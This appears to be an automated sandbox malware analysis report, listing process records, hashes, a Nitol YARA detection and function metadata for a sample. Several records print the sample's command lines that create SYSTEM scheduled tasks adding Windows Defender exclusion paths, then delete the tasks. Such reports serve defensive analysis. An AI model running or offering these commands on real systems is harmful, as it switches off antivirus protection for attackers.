MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	07:55:13
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff61e590000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	07:55:13
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	07:55:13
Start date:	13/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	07:55:13
Start date:	13/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	07:55:13
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff61e590000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	07:55:13
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	07:55:13
Start date:	13/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	07:55:13
Start date:	13/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff725ad0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	07:55:14
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff61e590000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	07:55:14
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	07:55:14
Start date:	13/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	07:55:14
Start date:	13/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	07:55:14
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff61e590000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	07:55:14
Start date:	13/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	07:55:15
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	07:55:15
Start date:	13/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff725ad0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	07:55:15
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff61e590000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	07:55:15
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	07:55:16
Start date:	13/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	07:55:16
Start date:	13/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	07:55:16
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff61e590000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	07:55:16
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	07:55:16
Start date:	13/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	07:55:16
Start date:	13/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff725ad0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	07:55:46
Start date:	13/01/2025
Path:	C:\Program Files (x86)\YYAfLM\YYAfLM.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\YYAfLM\YYAfLM.exe"
Imagebase:	0x340000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000027.00000002.3583385721.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000027.00000002.3584084700.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	40
Start time:	07:55:49
Start date:	13/01/2025
Path:	C:\Program Files (x86)\YYAfLM\YYAfLM.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\YYAfLM\YYAfLM.exe"
Imagebase:	0x340000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	07:55:49
Start date:	13/01/2025
Path:	C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe"
Imagebase:	0x2c0000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	07:55:50
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c echo.>c:\xxxx.ini
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	07:55:50
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	07:56:01
Start date:	13/01/2025
Path:	C:\Program Files (x86)\YYAfLM\YYAfLM.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\YYAfLM\YYAfLM.exe"
Imagebase:	0x340000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	07:56:01
Start date:	13/01/2025
Path:	C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe"
Imagebase:	0x2c0000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	32%
Total number of Nodes:	462
Total number of Limit Nodes:	7

Executed Functions

Function 0000000140006C95 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 0000000140006D6C
@, xrefs: 0000000140006FA2

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00

Function 00000001400073E0 Relevance: 1.6, APIs: 1, Instructions: 121
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL ref: 00000001400073E2

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00

Function 0000000140005DF3 Relevance: 54.3, APIs: 3, Strings: 28, Instructions: 79
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE ref: 0000000140005F30
malloc.MSVCRT ref: 0000000140005FD3
ReadFile.KERNELBASE ref: 0000000140006016

Strings

M, xrefs: 0000000140005E99
p, xrefs: 0000000140005EB1
l, xrefs: 0000000140005FA0
s, xrefs: 0000000140005F5F
s, xrefs: 0000000140005EA1
c, xrefs: 0000000140005FAA
L, xrefs: 0000000140005EB9
l, xrefs: 0000000140005F82
o, xrefs: 0000000140005FA5
a, xrefs: 0000000140005EE9
., xrefs: 0000000140005F78
M, xrefs: 0000000140005EA9
d, xrefs: 0000000140005EE1
v, xrefs: 0000000140005F64
a, xrefs: 0000000140005F96
r, xrefs: 0000000140005F6E
t, xrefs: 0000000140005ED1
s, xrefs: 0000000140005EC9
t, xrefs: 0000000140005EF1
m, xrefs: 0000000140005F5A
m, xrefs: 0000000140005F91
t, xrefs: 0000000140005F73
l, xrefs: 0000000140005F87
c, xrefs: 0000000140005F69
., xrefs: 0000000140005ED9
d, xrefs: 0000000140005F7D
i, xrefs: 0000000140005EC1
l, xrefs: 0000000140005F9B

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: File$CreateReadmalloc
String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
API String ID: 3950102678-3381721293
Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22

Function 00007FFE1A511C00 Relevance: 12.2, APIs: 8, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFE1A511C28
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFE1A511C7A
_RTC_Initialize.LIBCMT ref: 00007FFE1A511CA8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFE1A511CCE
__scrt_release_startup_lock.LIBCMT ref: 00007FFE1A511CF9

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
Instruction ID: c21254168a6c38ba4aeb7cc295dc4afa669e855f3f2cc82f7fd314385894a44c
Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
Instruction Fuzzy Hash: 83817C61F0CF4385FA54ABA794412B92692BF57FE0F5445FBE90C476B2DE3CE8468600

Function 00007FFE1A511720 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNEL32 ref: 00007FFE1A511753
FreeLibrary.KERNEL32 ref: 00007FFE1A511981

Part of subcall function 00007FFE1A511B90: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE1A511BC0
Part of subcall function 00007FFE1A511B90: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE1A511BC6

Part of subcall function 00007FFE1A511720: FindFirstFileA.KERNELBASE ref: 00007FFE1A511536

Strings

Rcl^i, xrefs: 00007FFE1A5111C4, 00007FFE1A51150D, 00007FFE1A511740
WordpadFilter.db, xrefs: 00007FFE1A511527

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
String ID: Rcl^i$WordpadFilter.db
API String ID: 868324331-1818683668
Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
Instruction ID: 262a7618dd604510a41771ef6bd69b5565cfe51350de7ece001007f1a8e80642
Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
Instruction Fuzzy Hash: E6317C32B19F41C9E700CBA2D8406BD73A6FB89B98F1445BAEE4D13B54EE38D591C340

Function 00007FFE1A5111B0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 235
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFE1A5114EB
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE1A5114F7

Strings

Rcl^i, xrefs: 00007FFE1A5111C4, 00007FFE1A511740

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: Rcl^i
API String ID: 73155330-2241636769
Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
Instruction ID: 20d6554e5a77a0e93d02f1eb56233782f8c58d09a44b0c09e4f8f4e9a80f9ef3
Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
Instruction Fuzzy Hash: A3813A22B1DB8245E6118B3698401B9B695FF57FE4F1483BBEE59577A2EF3CE0918300

Non-executed Functions

Function 0000000140001A30 Relevance: 37.9, APIs: 30, Instructions: 422memorystringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140001AA6
LeaveCriticalSection.KERNEL32 ref: 0000000140001B30
EnterCriticalSection.KERNEL32 ref: 0000000140001B48
LeaveCriticalSection.KERNEL32 ref: 0000000140001BC9
EnterCriticalSection.KERNEL32 ref: 0000000140001BE6
LeaveCriticalSection.KERNEL32 ref: 0000000140001C67
EnterCriticalSection.KERNEL32 ref: 0000000140001C84
LeaveCriticalSection.KERNEL32 ref: 0000000140001D0D
lstrlenW.KERNEL32 ref: 0000000140001D1F
GetProcessHeap.KERNEL32 ref: 0000000140001D2E
HeapAlloc.KERNEL32 ref: 0000000140001D3C
EnterCriticalSection.KERNEL32 ref: 0000000140001D6F
LeaveCriticalSection.KERNEL32 ref: 0000000140001DF0
lstrlenW.KERNEL32 ref: 0000000140001DFF
GetProcessHeap.KERNEL32 ref: 0000000140001E0E
HeapAlloc.KERNEL32 ref: 0000000140001E1C
EnterCriticalSection.KERNEL32 ref: 0000000140001E4F
LeaveCriticalSection.KERNEL32 ref: 0000000140001ED0
EnterCriticalSection.KERNEL32 ref: 0000000140001EED
LeaveCriticalSection.KERNEL32 ref: 0000000140001F6E
lstrlenW.KERNEL32 ref: 0000000140001F7D
GetProcessHeap.KERNEL32 ref: 0000000140001F8C
HeapAlloc.KERNEL32 ref: 0000000140001F9A
EnterCriticalSection.KERNEL32 ref: 0000000140001FCD
LeaveCriticalSection.KERNEL32 ref: 000000014000204E
lstrlenW.KERNEL32 ref: 000000014000205D
GetProcessHeap.KERNEL32 ref: 000000014000206C
HeapAlloc.KERNEL32 ref: 000000014000207A
EnterCriticalSection.KERNEL32 ref: 00000001400020B4
LeaveCriticalSection.KERNEL32 ref: 000000014000214E

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
